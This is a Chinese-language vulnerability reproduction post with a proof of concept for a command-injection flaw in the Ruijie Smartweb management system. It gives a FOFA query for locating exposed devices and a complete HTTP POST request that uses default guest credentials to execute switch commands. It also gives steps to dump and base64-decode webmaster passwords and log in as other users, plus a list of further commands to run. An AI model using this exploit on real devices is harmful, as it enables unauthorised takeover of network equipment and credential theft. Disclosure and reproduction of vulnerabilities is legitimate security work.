锐捷 Smartweb管理系统命令注入漏洞复现 [附POC]

0x01 前言

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用！！！

0x02 漏洞描述

锐捷网络是一家拥有包括交换机、路由器、软件、安全防火墙、无线产品、存储等全系列的网络设备产品线及解决方案的专业化网络厂商。锐捷Smartweb系统存在远程命令执行漏洞，攻击者通过漏洞可以获取服务器权限，导致服务器失陷。

0x03 影响版本

锐捷 Smartweb管理系统

0x04 漏洞环境

FOFA语法： title=“无线smartWeb–登录页面”

0x05 漏洞复现

1.访问漏洞环境

2.构造POC

POC （POST）

POST /WEB_VMS/LEVEL15/ HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
Content-Length: 81
DNT: 1
Connection: close
Cookie: auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest; login=1; oid=1.3.6.1.4.1.4881.1.1.10.1.3; type=WS5302

command=锐捷交换机命令&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.

3.复现

1.执行查看用户名和密码的数据包，show webmaster users查看回显
2.base64解码即可登录多个用户的页面

3.执行查看版本信息命令，show version查看回显

PS：其他命令（锐捷交换机命令参考：https://www.bilibili.com/read/cv12330628）

show running-config               查看当前生效的配置信息
show interface fastethernet 0/3   查看F0/3端口信息
show interface serial 1/2         查看S1/2端口信息
show interface                    查看所有端口信息
show ip interface brief           以简洁方式汇总查看所有端口信息
show ip interface                 查看所有端口信息
show version                      查看版本信息